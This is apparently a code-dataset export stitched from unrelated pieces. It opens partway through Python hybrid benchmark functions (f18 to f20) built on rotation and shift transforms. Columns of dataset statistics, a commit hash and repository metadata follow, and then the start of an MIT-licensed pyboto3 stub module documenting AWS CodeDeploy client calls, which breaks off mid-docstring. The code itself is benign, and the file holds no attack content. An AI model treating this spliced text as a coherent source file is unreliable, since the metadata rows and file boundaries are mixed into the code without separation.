x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
rotation (matrix): Optional rotation matrix. If None (default), the
official matrix from the benchmark suite will be used.
shift (array): Optional shift vector. If None (default), the official
vector from the benchmark suite will be used.
shuffle (array): Optionbal shuffle vector. If None (default), the
official permutation vector from the benchmark suite will be used.
"""
nx = len(x)
if rotation is None:
rotation = transforms.rotations[nx][17]
if shift is None:
shift = transforms.shifts[17][:nx]
if shuffle is None:
shuffle = transforms.shuffles[nx][7]
x_transformed = np.matmul(rotation, x - shift)
x_parts = _shuffle_and_partition(x_transformed, shuffle, [0.2, 0.2, 0.2, 0.2, 0.2])
y = basic.high_conditioned_elliptic(x_parts[0])
y += basic.ackley(x_parts[1])
y += basic.rastrigin(x_parts[2])
y += basic.h_g_bat(x_parts[3])
y += basic.discus(x_parts[4])
return y + 1800.0
def f19(x, rotation=None, shift=None, shuffle=None):
"""
Hybrid Function 9 (N=5)
Args:
x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
rotation (matrix): Optional rotation matrix. If None (default), the
official matrix from the benchmark suite will be used.
shift (array): Optional shift vector. If None (default), the official
vector from the benchmark suite will be used.
shuffle (array): Optionbal shuffle vector. If None (default), the
official permutation vector from the benchmark suite will be used.
"""
nx = len(x)
if rotation is None:
rotation = transforms.rotations[nx][18]
if shift is None:
shift = transforms.shifts[18][:nx]
if shuffle is None:
shuffle = transforms.shuffles[nx][8]
x_transformed = np.matmul(rotation, x - shift)
x_parts = _shuffle_and_partition(x_transformed, shuffle, [0.2, 0.2, 0.2, 0.2, 0.2])
y = basic.bent_cigar(x_parts[0])
y += basic.rastrigin(x_parts[1])
y += basic.expanded_griewanks_plus_rosenbrock(x_parts[2])
y += basic.weierstrass(x_parts[3])
y += basic.expanded_schaffers_f6(x_parts[4])
return y + 1900.0
def f20(x, rotation=None, shift=None, shuffle=None):
"""
Hybrid Function 10 (N=6)
Args:
x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
rotation (matrix): Optional rotation matrix. If None (default), the
official matrix from the benchmark suite will be used.
shift (array): Optional shift vector. If None (default), the official
vector from the benchmark suite will be used.
shuffle (array): Optionbal shuffle vector. If None (default), the
official permutation vector from the benchmark suite will be used.
"""
nx = len(x)
if rotation is None:
rotation = transforms.rotations[nx][19]
if shift is None:
shift = transforms.shifts[19][:nx]
if shuffle is None:
shuffle = transforms.shuffles[nx][9]
x_transformed = np.matmul(rotation, x - shift)
x_parts = _shuffle_and_partition(x_transformed, shuffle, [0.1, 0.1, 0.2, 0.2, 0.2, 0.2])
y = basic.happy_cat(x_parts[0])
y += basic.katsuura(x_parts[1])
y += basic.ackley(x_parts[2])
y += basic.rastrigin(x_parts[3])
y += basic.modified_schwefel(x_parts[4])
y += basic.schaffers_f7(x_parts[5])
return y + 2000.0
all_functions = [
f11,
f12,
f13,
f14,
f15,
f16,
f17,
f18,
f19,
f20
]
| 35.931818
| 92
| 0.636543
| 1,827
| 12,648
| 4.329502
| 0.085933
| 0.039444
| 0.049305
| 0.060683
| 0.898736
| 0.874083
| 0.85689
| 0.812516
| 0.806068
| 0.675727
| 0
| 0.045093
| 0.254823
| 12,648
| 351
| 93
| 36.034188
| 0.794164
| 0.431847
| 0
| 0.438889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061111
| false
| 0
| 0.016667
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
81faa7648be2638616b6a6c23b8edce7bbbe3291
| 97,150
|
py
|
Python
|
pyboto3/codedeploy.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/codedeploy.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/codedeploy.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def add_tags_to_on_premises_instances(tags=None, instanceNames=None):
"""
Adds tags to on-premises instances.
See also: AWS API Documentation
:example: response = client.add_tags_to_on_premises_instances(
tags=[
{
'Key': 'string',
'Value': 'string'
},
],
instanceNames=[
'string',
]
)
:type tags: list
:param tags: [REQUIRED]
The tag key-value pairs to add to the on-premises instances.
Keys and values are both required. Keys cannot be null or empty strings. Value-only tags are not allowed.
(dict) --Information about a tag.
Key (string) --The tag's key.
Value (string) --The tag's value.
:type instanceNames: list
:param instanceNames: [REQUIRED]
The names of the on-premises instances to which to add tags.
(string) --
"""
pass
def batch_get_application_revisions(applicationName=None, revisions=None):
"""
Gets information about one or more application revisions.
See also: AWS API Documentation
:example: response = client.batch_get_application_revisions(
applicationName='string',
revisions=[
{
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
]
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application about which to get revision information.
:type revisions: list
:param revisions: [REQUIRED]
Information to get about the application revisions, including type and location.
(dict) --Information about the location of an application revision.
revisionType (string) --The type of application revision:
S3: An application revision stored in Amazon S3.
GitHub: An application revision stored in GitHub.
s3Location (dict) --Information about the location of application artifacts stored in Amazon S3.
bucket (string) --The name of the Amazon S3 bucket where the application revision is stored.
key (string) --The name of the Amazon S3 object that represents the bundled artifacts for the application revision.
bundleType (string) --The file type of the application revision. Must be one of the following:
tar: A tar archive file.
tgz: A compressed tar archive file.
zip: A zip archive file.
version (string) --A specific version of the Amazon S3 object that represents the bundled artifacts for the application revision.
If the version is not specified, the system will use the most recent version by default.
eTag (string) --The ETag of the Amazon S3 object that represents the bundled artifacts for the application revision.
If the ETag is not specified as an input parameter, ETag validation of the object will be skipped.
gitHubLocation (dict) --Information about the location of application artifacts stored in GitHub.
repository (string) --The GitHub account and repository pair that stores a reference to the commit that represents the bundled artifacts for the application revision.
Specified as account/repository.
commitId (string) --The SHA1 commit ID of the GitHub commit that represents the bundled artifacts for the application revision.
:rtype: dict
:return: {
'applicationName': 'string',
'errorMessage': 'string',
'revisions': [
{
'revisionLocation': {
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
'genericRevisionInfo': {
'description': 'string',
'deploymentGroups': [
'string',
],
'firstUsedTime': datetime(2015, 1, 1),
'lastUsedTime': datetime(2015, 1, 1),
'registerTime': datetime(2015, 1, 1)
}
},
]
}
:returns:
S3: An application revision stored in Amazon S3.
GitHub: An application revision stored in GitHub.
"""
pass
def batch_get_applications(applicationNames=None):
"""
Gets information about one or more applications.
See also: AWS API Documentation
:example: response = client.batch_get_applications(
applicationNames=[
'string',
]
)
:type applicationNames: list
:param applicationNames: A list of application names separated by spaces.
(string) --
:rtype: dict
:return: {
'applicationsInfo': [
{
'applicationId': 'string',
'applicationName': 'string',
'createTime': datetime(2015, 1, 1),
'linkedToGitHub': True|False,
'gitHubAccountName': 'string'
},
]
}
"""
pass
def batch_get_deployment_groups(applicationName=None, deploymentGroupNames=None):
"""
Gets information about one or more deployment groups.
See also: AWS API Documentation
:example: response = client.batch_get_deployment_groups(
applicationName='string',
deploymentGroupNames=[
'string',
]
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
:type deploymentGroupNames: list
:param deploymentGroupNames: [REQUIRED]
The deployment groups' names.
(string) --
:rtype: dict
:return: {
'deploymentGroupsInfo': [
{
'applicationName': 'string',
'deploymentGroupId': 'string',
'deploymentGroupName': 'string',
'deploymentConfigName': 'string',
'ec2TagFilters': [
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
'onPremisesInstanceTagFilters': [
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
'autoScalingGroups': [
{
'name': 'string',
'hook': 'string'
},
],
'serviceRoleArn': 'string',
'targetRevision': {
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
'triggerConfigurations': [
{
'triggerName': 'string',
'triggerTargetArn': 'string',
'triggerEvents': [
'DeploymentStart'|'DeploymentSuccess'|'DeploymentFailure'|'DeploymentStop'|'DeploymentRollback'|'DeploymentReady'|'InstanceStart'|'InstanceSuccess'|'InstanceFailure'|'InstanceReady',
]
},
],
'alarmConfiguration': {
'enabled': True|False,
'ignorePollAlarmFailure': True|False,
'alarms': [
{
'name': 'string'
},
]
},
'autoRollbackConfiguration': {
'enabled': True|False,
'events': [
'DEPLOYMENT_FAILURE'|'DEPLOYMENT_STOP_ON_ALARM'|'DEPLOYMENT_STOP_ON_REQUEST',
]
},
'deploymentStyle': {
'deploymentType': 'IN_PLACE'|'BLUE_GREEN',
'deploymentOption': 'WITH_TRAFFIC_CONTROL'|'WITHOUT_TRAFFIC_CONTROL'
},
'blueGreenDeploymentConfiguration': {
'terminateBlueInstancesOnDeploymentSuccess': {
'action': 'TERMINATE'|'KEEP_ALIVE',
'terminationWaitTimeInMinutes': 123
},
'deploymentReadyOption': {
'actionOnTimeout': 'CONTINUE_DEPLOYMENT'|'STOP_DEPLOYMENT',
'waitTimeInMinutes': 123
},
'greenFleetProvisioningOption': {
'action': 'DISCOVER_EXISTING'|'COPY_AUTO_SCALING_GROUP'
}
},
'loadBalancerInfo': {
'elbInfoList': [
{
'name': 'string'
},
]
},
'lastSuccessfulDeployment': {
'deploymentId': 'string',
'status': 'Created'|'Queued'|'InProgress'|'Succeeded'|'Failed'|'Stopped'|'Ready',
'endTime': datetime(2015, 1, 1),
'createTime': datetime(2015, 1, 1)
},
'lastAttemptedDeployment': {
'deploymentId': 'string',
'status': 'Created'|'Queued'|'InProgress'|'Succeeded'|'Failed'|'Stopped'|'Ready',
'endTime': datetime(2015, 1, 1),
'createTime': datetime(2015, 1, 1)
}
},
],
'errorMessage': 'string'
}
:returns:
KEY_ONLY: Key only.
VALUE_ONLY: Value only.
KEY_AND_VALUE: Key and value.
"""
pass
def batch_get_deployment_instances(deploymentId=None, instanceIds=None):
"""
Gets information about one or more instance that are part of a deployment group.
See also: AWS API Documentation
:example: response = client.batch_get_deployment_instances(
deploymentId='string',
instanceIds=[
'string',
]
)
:type deploymentId: string
:param deploymentId: [REQUIRED]
The unique ID of a deployment.
:type instanceIds: list
:param instanceIds: [REQUIRED]
The unique IDs of instances in the deployment group.
(string) --
:rtype: dict
:return: {
'instancesSummary': [
{
'deploymentId': 'string',
'instanceId': 'string',
'status': 'Pending'|'InProgress'|'Succeeded'|'Failed'|'Skipped'|'Unknown'|'Ready',
'lastUpdatedAt': datetime(2015, 1, 1),
'lifecycleEvents': [
{
'lifecycleEventName': 'string',
'diagnostics': {
'errorCode': 'Success'|'ScriptMissing'|'ScriptNotExecutable'|'ScriptTimedOut'|'ScriptFailed'|'UnknownError',
'scriptName': 'string',
'message': 'string',
'logTail': 'string'
},
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'status': 'Pending'|'InProgress'|'Succeeded'|'Failed'|'Skipped'|'Unknown'
},
],
'instanceType': 'Blue'|'Green'
},
],
'errorMessage': 'string'
}
:returns:
Pending: The deployment is pending for this instance.
In Progress: The deployment is in progress for this instance.
Succeeded: The deployment has succeeded for this instance.
Failed: The deployment has failed for this instance.
Skipped: The deployment has been skipped for this instance.
Unknown: The deployment status is unknown for this instance.
"""
pass
def batch_get_deployments(deploymentIds=None):
"""
Gets information about one or more deployments.
See also: AWS API Documentation
:example: response = client.batch_get_deployments(
deploymentIds=[
'string',
]
)
:type deploymentIds: list
:param deploymentIds: A list of deployment IDs, separated by spaces.
(string) --
:rtype: dict
:return: {
'deploymentsInfo': [
{
'applicationName': 'string',
'deploymentGroupName': 'string',
'deploymentConfigName': 'string',
'deploymentId': 'string',
'previousRevision': {
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
'revision': {
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
'status': 'Created'|'Queued'|'InProgress'|'Succeeded'|'Failed'|'Stopped'|'Ready',
'errorInformation': {
'code': 'DEPLOYMENT_GROUP_MISSING'|'APPLICATION_MISSING'|'REVISION_MISSING'|'IAM_ROLE_MISSING'|'IAM_ROLE_PERMISSIONS'|'NO_EC2_SUBSCRIPTION'|'OVER_MAX_INSTANCES'|'NO_INSTANCES'|'TIMEOUT'|'HEALTH_CONSTRAINTS_INVALID'|'HEALTH_CONSTRAINTS'|'INTERNAL_ERROR'|'THROTTLED'|'ALARM_ACTIVE'|'AGENT_ISSUE'|'AUTO_SCALING_IAM_ROLE_PERMISSIONS'|'AUTO_SCALING_CONFIGURATION'|'MANUAL_STOP',
'message': 'string'
},
'createTime': datetime(2015, 1, 1),
'startTime': datetime(2015, 1, 1),
'completeTime': datetime(2015, 1, 1),
'deploymentOverview': {
'Pending': 123,
'InProgress': 123,
'Succeeded': 123,
'Failed': 123,
'Skipped': 123,
'Ready': 123
},
'description': 'string',
'creator': 'user'|'autoscaling'|'codeDeployRollback',
'ignoreApplicationStopFailures': True|False,
'autoRollbackConfiguration': {
'enabled': True|False,
'events': [
'DEPLOYMENT_FAILURE'|'DEPLOYMENT_STOP_ON_ALARM'|'DEPLOYMENT_STOP_ON_REQUEST',
]
},
'updateOutdatedInstancesOnly': True|False,
'rollbackInfo': {
'rollbackDeploymentId': 'string',
'rollbackTriggeringDeploymentId': 'string',
'rollbackMessage': 'string'
},
'deploymentStyle': {
'deploymentType': 'IN_PLACE'|'BLUE_GREEN',
'deploymentOption': 'WITH_TRAFFIC_CONTROL'|'WITHOUT_TRAFFIC_CONTROL'
},
'targetInstances': {
'tagFilters': [
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
'autoScalingGroups': [
'string',
]
},
'instanceTerminationWaitTimeStarted': True|False,
'blueGreenDeploymentConfiguration': {
'terminateBlueInstancesOnDeploymentSuccess': {
'action': 'TERMINATE'|'KEEP_ALIVE',
'terminationWaitTimeInMinutes': 123
},
'deploymentReadyOption': {
'actionOnTimeout': 'CONTINUE_DEPLOYMENT'|'STOP_DEPLOYMENT',
'waitTimeInMinutes': 123
},
'greenFleetProvisioningOption': {
'action': 'DISCOVER_EXISTING'|'COPY_AUTO_SCALING_GROUP'
}
},
'loadBalancerInfo': {
'elbInfoList': [
{
'name': 'string'
},
]
},
'additionalDeploymentStatusInfo': 'string',
'fileExistsBehavior': 'DISALLOW'|'OVERWRITE'|'RETAIN'
},
]
}
:returns:
S3: An application revision stored in Amazon S3.
GitHub: An application revision stored in GitHub.
"""
pass
def batch_get_on_premises_instances(instanceNames=None):
"""
Gets information about one or more on-premises instances.
See also: AWS API Documentation
:example: response = client.batch_get_on_premises_instances(
instanceNames=[
'string',
]
)
:type instanceNames: list
:param instanceNames: The names of the on-premises instances about which to get information.
(string) --
:rtype: dict
:return: {
'instanceInfos': [
{
'instanceName': 'string',
'iamSessionArn': 'string',
'iamUserArn': 'string',
'instanceArn': 'string',
'registerTime': datetime(2015, 1, 1),
'deregisterTime': datetime(2015, 1, 1),
'tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
]
}
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
"""
pass
def continue_deployment(deploymentId=None):
"""
For a blue/green deployment, starts the process of rerouting traffic from instances in the original environment to instances in the replacement environment without waiting for a specified wait time to elapse. (Traffic rerouting, which is achieved by registering instances in the replacement environment with the load balancer, can start as soon as all instances have a status of Ready.)
See also: AWS API Documentation
:example: response = client.continue_deployment(
deploymentId='string'
)
:type deploymentId: string
:param deploymentId: The deployment ID of the blue/green deployment for which you want to start rerouting traffic to the replacement environment.
"""
pass
def create_application(applicationName=None):
"""
Creates an application.
See also: AWS API Documentation
:example: response = client.create_application(
applicationName='string'
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of the application. This name must be unique with the applicable IAM user or AWS account.
:rtype: dict
:return: {
'applicationId': 'string'
}
"""
pass
def create_deployment(applicationName=None, deploymentGroupName=None, revision=None, deploymentConfigName=None, description=None, ignoreApplicationStopFailures=None, targetInstances=None, autoRollbackConfiguration=None, updateOutdatedInstancesOnly=None, fileExistsBehavior=None):
"""
Deploys an application revision through the specified deployment group.
See also: AWS API Documentation
:example: response = client.create_deployment(
applicationName='string',
deploymentGroupName='string',
revision={
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
deploymentConfigName='string',
description='string',
ignoreApplicationStopFailures=True|False,
targetInstances={
'tagFilters': [
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
'autoScalingGroups': [
'string',
]
},
autoRollbackConfiguration={
'enabled': True|False,
'events': [
'DEPLOYMENT_FAILURE'|'DEPLOYMENT_STOP_ON_ALARM'|'DEPLOYMENT_STOP_ON_REQUEST',
]
},
updateOutdatedInstancesOnly=True|False,
fileExistsBehavior='DISALLOW'|'OVERWRITE'|'RETAIN'
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
:type deploymentGroupName: string
:param deploymentGroupName: The name of the deployment group.
:type revision: dict
:param revision: The type and location of the revision to deploy.
revisionType (string) --The type of application revision:
S3: An application revision stored in Amazon S3.
GitHub: An application revision stored in GitHub.
s3Location (dict) --Information about the location of application artifacts stored in Amazon S3.
bucket (string) --The name of the Amazon S3 bucket where the application revision is stored.
key (string) --The name of the Amazon S3 object that represents the bundled artifacts for the application revision.
bundleType (string) --The file type of the application revision. Must be one of the following:
tar: A tar archive file.
tgz: A compressed tar archive file.
zip: A zip archive file.
version (string) --A specific version of the Amazon S3 object that represents the bundled artifacts for the application revision.
If the version is not specified, the system will use the most recent version by default.
eTag (string) --The ETag of the Amazon S3 object that represents the bundled artifacts for the application revision.
If the ETag is not specified as an input parameter, ETag validation of the object will be skipped.
gitHubLocation (dict) --Information about the location of application artifacts stored in GitHub.
repository (string) --The GitHub account and repository pair that stores a reference to the commit that represents the bundled artifacts for the application revision.
Specified as account/repository.
commitId (string) --The SHA1 commit ID of the GitHub commit that represents the bundled artifacts for the application revision.
:type deploymentConfigName: string
:param deploymentConfigName: The name of a deployment configuration associated with the applicable IAM user or AWS account.
If not specified, the value configured in the deployment group will be used as the default. If the deployment group does not have a deployment configuration associated with it, then CodeDeployDefault.OneAtATime will be used by default.
:type description: string
:param description: A comment about the deployment.
:type ignoreApplicationStopFailures: boolean
:param ignoreApplicationStopFailures: If set to true, then if the deployment causes the ApplicationStop deployment lifecycle event to an instance to fail, the deployment to that instance will not be considered to have failed at that point and will continue on to the BeforeInstall deployment lifecycle event.
If set to false or not specified, then if the deployment causes the ApplicationStop deployment lifecycle event to fail to an instance, the deployment to that instance will stop, and the deployment to that instance will be considered to have failed.
:type targetInstances: dict
:param targetInstances: Information about the instances that will belong to the replacement environment in a blue/green deployment.
tagFilters (list) --The tag filter key, type, and value used to identify Amazon EC2 instances in a replacement environment for a blue/green deployment.
(dict) --Information about an EC2 tag filter.
Key (string) --The tag filter key.
Value (string) --The tag filter value.
Type (string) --The tag filter type:
KEY_ONLY: Key only.
VALUE_ONLY: Value only.
KEY_AND_VALUE: Key and value.
autoScalingGroups (list) --The names of one or more Auto Scaling groups to identify a replacement environment for a blue/green deployment.
(string) --
:type autoRollbackConfiguration: dict
:param autoRollbackConfiguration: Configuration information for an automatic rollback that is added when a deployment is created.
enabled (boolean) --Indicates whether a defined automatic rollback configuration is currently enabled.
events (list) --The event type or types that trigger a rollback.
(string) --
:type updateOutdatedInstancesOnly: boolean
:param updateOutdatedInstancesOnly: Indicates whether to deploy to all instances or only to instances that are not running the latest application revision.
:type fileExistsBehavior: string
:param fileExistsBehavior: Information about how AWS CodeDeploy handles files that already exist in a deployment target location but weren't part of the previous successful deployment.
The fileExistsBehavior parameter takes any of the following values:
DISALLOW: The deployment fails. This is also the default behavior if no option is specified.
OVERWRITE: The version of the file from the application revision currently being deployed replaces the version already on the instance.
RETAIN: The version of the file already on the instance is kept and used as part of the new deployment.
:rtype: dict
:return: {
'deploymentId': 'string'
}
"""
pass
def create_deployment_config(deploymentConfigName=None, minimumHealthyHosts=None):
"""
Creates a deployment configuration.
See also: AWS API Documentation
:example: response = client.create_deployment_config(
deploymentConfigName='string',
minimumHealthyHosts={
'value': 123,
'type': 'HOST_COUNT'|'FLEET_PERCENT'
}
)
:type deploymentConfigName: string
:param deploymentConfigName: [REQUIRED]
The name of the deployment configuration to create.
:type minimumHealthyHosts: dict
:param minimumHealthyHosts: The minimum number of healthy instances that should be available at any time during the deployment. There are two parameters expected in the input: type and value.
The type parameter takes either of the following values:
HOST_COUNT: The value parameter represents the minimum number of healthy instances as an absolute value.
FLEET_PERCENT: The value parameter represents the minimum number of healthy instances as a percentage of the total number of instances in the deployment. If you specify FLEET_PERCENT, at the start of the deployment, AWS CodeDeploy converts the percentage to the equivalent number of instance and rounds up fractional instances.
The value parameter takes an integer.
For example, to set a minimum of 95% healthy instance, specify a type of FLEET_PERCENT and a value of 95.
value (integer) --The minimum healthy instance value.
type (string) --The minimum healthy instance type:
HOST_COUNT: The minimum number of healthy instance as an absolute value.
FLEET_PERCENT: The minimum number of healthy instance as a percentage of the total number of instance in the deployment.
In an example of nine instance, if a HOST_COUNT of six is specified, deploy to up to three instances at a time. The deployment will be successful if six or more instances are deployed to successfully; otherwise, the deployment fails. If a FLEET_PERCENT of 40 is specified, deploy to up to five instance at a time. The deployment will be successful if four or more instance are deployed to successfully; otherwise, the deployment fails.
Note
In a call to the get deployment configuration operation, CodeDeployDefault.OneAtATime will return a minimum healthy instance type of MOST_CONCURRENCY and a value of 1. This means a deployment to only one instance at a time. (You cannot set the type to MOST_CONCURRENCY, only to HOST_COUNT or FLEET_PERCENT.) In addition, with CodeDeployDefault.OneAtATime, AWS CodeDeploy will try to ensure that all instances but one are kept in a healthy state during the deployment. Although this allows one instance at a time to be taken offline for a new deployment, it also means that if the deployment to the last instance fails, the overall deployment still succeeds.
For more information, see AWS CodeDeploy Instance Health in the AWS CodeDeploy User Guide .
:rtype: dict
:return: {
'deploymentConfigId': 'string'
}
"""
pass
def create_deployment_group(applicationName=None, deploymentGroupName=None, deploymentConfigName=None, ec2TagFilters=None, onPremisesInstanceTagFilters=None, autoScalingGroups=None, serviceRoleArn=None, triggerConfigurations=None, alarmConfiguration=None, autoRollbackConfiguration=None, deploymentStyle=None, blueGreenDeploymentConfiguration=None, loadBalancerInfo=None):
"""
Creates a deployment group to which application revisions will be deployed.
See also: AWS API Documentation
:example: response = client.create_deployment_group(
applicationName='string',
deploymentGroupName='string',
deploymentConfigName='string',
ec2TagFilters=[
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
onPremisesInstanceTagFilters=[
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
autoScalingGroups=[
'string',
],
serviceRoleArn='string',
triggerConfigurations=[
{
'triggerName': 'string',
'triggerTargetArn': 'string',
'triggerEvents': [
'DeploymentStart'|'DeploymentSuccess'|'DeploymentFailure'|'DeploymentStop'|'DeploymentRollback'|'DeploymentReady'|'InstanceStart'|'InstanceSuccess'|'InstanceFailure'|'InstanceReady',
]
},
],
alarmConfiguration={
'enabled': True|False,
'ignorePollAlarmFailure': True|False,
'alarms': [
{
'name': 'string'
},
]
},
autoRollbackConfiguration={
'enabled': True|False,
'events': [
'DEPLOYMENT_FAILURE'|'DEPLOYMENT_STOP_ON_ALARM'|'DEPLOYMENT_STOP_ON_REQUEST',
]
},
deploymentStyle={
'deploymentType': 'IN_PLACE'|'BLUE_GREEN',
'deploymentOption': 'WITH_TRAFFIC_CONTROL'|'WITHOUT_TRAFFIC_CONTROL'
},
blueGreenDeploymentConfiguration={
'terminateBlueInstancesOnDeploymentSuccess': {
'action': 'TERMINATE'|'KEEP_ALIVE',
'terminationWaitTimeInMinutes': 123
},
'deploymentReadyOption': {
'actionOnTimeout': 'CONTINUE_DEPLOYMENT'|'STOP_DEPLOYMENT',
'waitTimeInMinutes': 123
},
'greenFleetProvisioningOption': {
'action': 'DISCOVER_EXISTING'|'COPY_AUTO_SCALING_GROUP'
}
},
loadBalancerInfo={
'elbInfoList': [
{
'name': 'string'
},
]
}
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
:type deploymentGroupName: string
:param deploymentGroupName: [REQUIRED]
The name of a new deployment group for the specified application.
:type deploymentConfigName: string
:param deploymentConfigName: If specified, the deployment configuration name can be either one of the predefined configurations provided with AWS CodeDeploy or a custom deployment configuration that you create by calling the create deployment configuration operation.
CodeDeployDefault.OneAtATime is the default deployment configuration. It is used if a configuration isn't specified for the deployment or the deployment group.
For more information about the predefined deployment configurations in AWS CodeDeploy, see Working with Deployment Groups in AWS CodeDeploy in the AWS CodeDeploy User Guide.
:type ec2TagFilters: list
:param ec2TagFilters: The Amazon EC2 tags on which to filter. The deployment group will include EC2 instances with any of the specified tags.
(dict) --Information about an EC2 tag filter.
Key (string) --The tag filter key.
Value (string) --The tag filter value.
Type (string) --The tag filter type:
KEY_ONLY: Key only.
VALUE_ONLY: Value only.
KEY_AND_VALUE: Key and value.
:type onPremisesInstanceTagFilters: list
:param onPremisesInstanceTagFilters: The on-premises instance tags on which to filter. The deployment group will include on-premises instances with any of the specified tags.
(dict) --Information about an on-premises instance tag filter.
Key (string) --The on-premises instance tag filter key.
Value (string) --The on-premises instance tag filter value.
Type (string) --The on-premises instance tag filter type:
KEY_ONLY: Key only.
VALUE_ONLY: Value only.
KEY_AND_VALUE: Key and value.
:type autoScalingGroups: list
:param autoScalingGroups: A list of associated Auto Scaling groups.
(string) --
:type serviceRoleArn: string
:param serviceRoleArn: [REQUIRED]
A service role ARN that allows AWS CodeDeploy to act on the user's behalf when interacting with AWS services.
:type triggerConfigurations: list
:param triggerConfigurations: Information about triggers to create when the deployment group is created. For examples, see Create a Trigger for an AWS CodeDeploy Event in the AWS CodeDeploy User Guide.
(dict) --Information about notification triggers for the deployment group.
triggerName (string) --The name of the notification trigger.
triggerTargetArn (string) --The ARN of the Amazon Simple Notification Service topic through which notifications about deployment or instance events are sent.
triggerEvents (list) --The event type or types for which notifications are triggered.
(string) --
:type alarmConfiguration: dict
:param alarmConfiguration: Information to add about Amazon CloudWatch alarms when the deployment group is created.
enabled (boolean) --Indicates whether the alarm configuration is enabled.
ignorePollAlarmFailure (boolean) --Indicates whether a deployment should continue if information about the current state of alarms cannot be retrieved from Amazon CloudWatch. The default value is false.
true: The deployment will proceed even if alarm status information can't be retrieved from Amazon CloudWatch.
false: The deployment will stop if alarm status information can't be retrieved from Amazon CloudWatch.
alarms (list) --A list of alarms configured for the deployment group. A maximum of 10 alarms can be added to a deployment group.
(dict) --Information about an alarm.
name (string) --The name of the alarm. Maximum length is 255 characters. Each alarm name can be used only once in a list of alarms.
:type autoRollbackConfiguration: dict
:param autoRollbackConfiguration: Configuration information for an automatic rollback that is added when a deployment group is created.
